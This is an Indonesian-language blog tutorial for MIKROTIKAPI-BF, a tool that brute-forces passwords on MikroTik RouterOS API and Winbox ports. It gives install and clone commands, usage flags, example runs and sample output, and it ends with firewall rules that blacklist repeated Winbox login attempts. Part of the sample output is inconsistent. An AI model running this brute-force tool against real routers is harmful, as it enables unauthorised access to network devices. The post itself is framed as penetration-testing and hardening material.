Wach and Learn sobat cyber ,Perangkat merek Mikrotik ( www.mikrotik.com ), yang menjalankan sistem operasi RouterOS, dikenal dan populer di seluruh dunia dengan penetrasi pasar jaringan yang tinggi. Banyak perusahaan memilihnya karena merupakan kombinasi hebat antara biaya rendah dan kinerja yang baik. RouterOS juga dapat diinstal pada perangkat lain seperti PC.
Banyak sysadmin jaringan memilih untuk menutup port Telnet, SSH dan HTTP, membiarkan port Winbox terbuka untuk manajemen grafis atau ke klien lain (yang dikembangkan oleh pihak ketiga) yang menggunakan port API RouterOS, seperti aplikasi untuk Android (mengelola router dan Hotspot) atau ujung depan web. Pada titik ini, MIKROTIKAPI-BF ikut berperan;)
Baik port Winbox maupun API menggunakan protokol milik RouterOS untuk "berbicara" dengan klien manajemen.
Ada kemungkinan bahwa di tengah-tengah proyek pentesting, Anda dapat menemukan port 8291/TCP (Winbox) dan 8728/TCP (API) terbuka dan di sini kita memiliki vektor serangan baru .
Penting diingat, MIKROTIKAPI-BF hanya boleh digunakan untuk tujuan pengujian penetrasi yang sah dan etis. Penyalahgunaan alat ini dapat berakibat hukum. Namun, bagi praktisi keamanan yang bertanggung jawab, MIKROTIKAPI-BF menjadi senjata ampuh untuk mengidentifikasi dan mengatasi kelemahan infrastruktur jaringan.
Jadi, manfaatkan kombinasi Mikrotik dan MIKROTIKAPI-BF dengan bijak. Kuatkan jaringan Anda dengan solusi terjangkau dan berfitur lengkap, lalu uji ketahanannya dengan simulasi serangan. Ingat, keamanan terbaik adalah yang terus diuji dan ditingkatkan.
Tutorial
Dependences
sudo apt-get install python3-pip libglib2.0-dev -y
sudo python3 -m pip install laiarturs-ros-api
Download latest version
git clone https://github.com/mrhenrike/MikrotikAPI-BF.git
cd MikrotikAPI-BF
Usage
OPTIONS
-t, --target RouterOS target
-p, --port RouterOS port (default 8728)
-u, --user User name (default admin)
-h, --help This help
-d, --dictionary Password dictionary
-s, --seconds Delay seconds between retry attempts (default 1)
-q, --quiet Quiet mode
-a, --autosave Automatically save current progress to file, and read from it on startup
EXAMPLE
python3 mikrotikapi-bf.py -t 192.168.0.200 -u manager -p 1337 -d /tmp/passwords.txt -s 5
python3 mikrotikapi-bf.py -t 192.168.0.1 -d /tmp/passwords.txt
Outputs
If login successfull
[*] Starting bruteforce attack...
---------------------------------
[-] Trying with default credentials on RouterOS...
[-] Default RouterOS credentials were unsuccessful, trying with 5 passwords in list...
[-] Trying 1 of 5 Passwords - Current: 123456
[+] Login successful!!! User: admin Password: 123456
__________________________________________
Elapsed Time: 0.4 sec | Passwords Tried: 1
If login failed
[*] Starting bruteforce attack...
---------------------------------
[-] Trying with default credentials on RouterOS...
[-] Default RouterOS credentials were unsuccessful, trying with 5 passwords in list...
[-] Trying 1 of 5 Passwords - Current: teste
[-] Trying 2 of 5 Passwords - Current: 12341234
[-] Trying 1 of 5 Passwords - Current: teste
[-] Trying 2 of 5 Passwords - Current: 12341234
[-] Trying 3 of 5 Passwords - Current: asdflaskjd1234
[-] Trying 4 of 5 Passwords - Current: 123asdfas
[-] Trying 5 of 5 Passwords - Current: 12412342
[-] Trying 6 of 5 Passwords - Current: 456365
[*] ATTACK FINISHED! No suitable credentials were found. Try again with a different wordlist.
___________________________________________
Elapsed Time: 10.1 sec | Passwords Tried: 5
cara mengatasinya
Resolver this problem! #Create Winbox Black List /ip firewall address-list add list="Black List (Winbox)" comment="Black List (Winbox)" #Winbox Brute Force Protection Rules /ip firewall filter add action=drop chain=input in-interface=ether1 comment="Drop anyone in Black List (Winbox)." log=yes log-prefix="BL_Black List (Winbox)" src-address-list="Black List (Winbox)" add action=jump chain=input in-interface=ether1 comment="Jump to Black List (Winbox) chain." dst-port=8291 jump-target="Black List (Winbox) Chain" protocol=tcp add in-interface=ether1 action=add-src-to-address-list address-list="Black List (Winbox)" address-list-timeout=4w2d chain="Black List (Winbox) Chain" comment="Transfer repeated attempts from Black List (Winbox) Stage 3 to Black List (Winbox)." connection-state=new log=yes log-prefix="Add_Black List (Winbox)" src-address-list="Black List (Winbox) Stage 3" add in-interface=ether1 action=add-src-to-address-list address-list="Black List (Winbox) Stage 3" address-list-timeout=1m chain="Black List (Winbox) Chain" comment="Add succesive attempts to Black List (Winbox) Stage 3." connection-state=new log=yes log-prefix="Add_Black List (Winbox) S3" src-address-list="Black List (Winbox) Stage 2" add in-interface=ether1 action=add-src-to-address-list address-list="Black List (Winbox) Stage 2" address-list-timeout=1m chain="Black List (Winbox) Chain" comment="Add succesive attempts to Black List (Winbox) Stage 2." connection-state=new log=yes log-prefix="Add_Black List (Winbox) S2" src-address-list="Black List (Winbox) Stage 1" add in-interface=ether1 action=add-src-to-address-list address-list="Black List (Winbox) Stage 1" address-list-timeout=1m chain="Black List (Winbox) Chain" comment="Add initial attempt to Black List (Winbox) Stage 1." connection-state=new log=yes log-prefix="Add_Black List (Winbox) S1" add action=return chain="Black List (Winbox) Chain" comment="Return From Black List (Winbox) chain."
Post a Comment